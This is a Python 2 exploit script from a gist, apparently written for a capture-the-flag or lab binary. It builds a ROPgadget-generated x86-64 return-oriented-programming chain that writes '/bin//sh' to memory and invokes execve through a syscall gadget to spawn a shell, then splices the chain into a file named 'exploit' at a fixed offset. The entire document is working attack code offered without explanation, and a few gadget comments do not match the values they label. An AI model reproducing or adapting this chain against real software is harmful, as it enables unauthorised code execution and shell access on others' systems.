gistfile1.txt

#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack
import binascii

# Padding goes here
p = ''

p += pack('<Q', 0x0000000000401907) # pop rsi ; ret
p += pack('<Q', 0x00000000006be080) # @ .data
p += pack('<Q', 0x000000000041a124) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x0000000000441781) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401907) # pop rsi ; ret
p += pack('<Q', 0x00000000006be088) # @ .data + 8
p += pack('<Q', 0x00000000004310a5) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000441781) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004017e6) # pop rdi ; ret
p += pack('<Q', 0x00000000006be080) # @ .data
p += pack('<Q', 0x0000000000401907) # pop rsi ; ret
p += pack('<Q', 0x00000000006be088) # @ .data + 8
p += pack('<Q', 0x000000000041a246) # pop rdx ; ret
p += pack('<Q', 0x00000000006be088) # @ .data + 8
p += pack('<Q', 0x000000000041a124) # pop rax ; retf
p += pack('<Q', 0x000000000000003b) # @ .data +8
## # r12 = 0x22
## #p += pack('<Q', 0x000000000040e4d9) # 0x000000000040e4d9 : mov rax, r12 ; pop rbx ; pop rbp ; pop r12 ; ret
## p += pack('<Q', 0x0000000000474010) # mov rax, 7 ; ret
## # += 52
## for i in range(52):
##     p += pack('<Q', 0x0000000000473f80) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000400446) # syscall

CHAIN_START = 0x00010d0 + 5

print len(p)
p = p[:448]
with open('exploit', 'r') as dummy:
    with open('exploit_with_payload', 'wb') as out:
        file_content = dummy.read()
        print binascii.hexlify(file_content[CHAIN_START : CHAIN_START + 16])
        new = file_content[:CHAIN_START]
        new += p
        new += file_content[CHAIN_START + len(p):]
        out.write(new)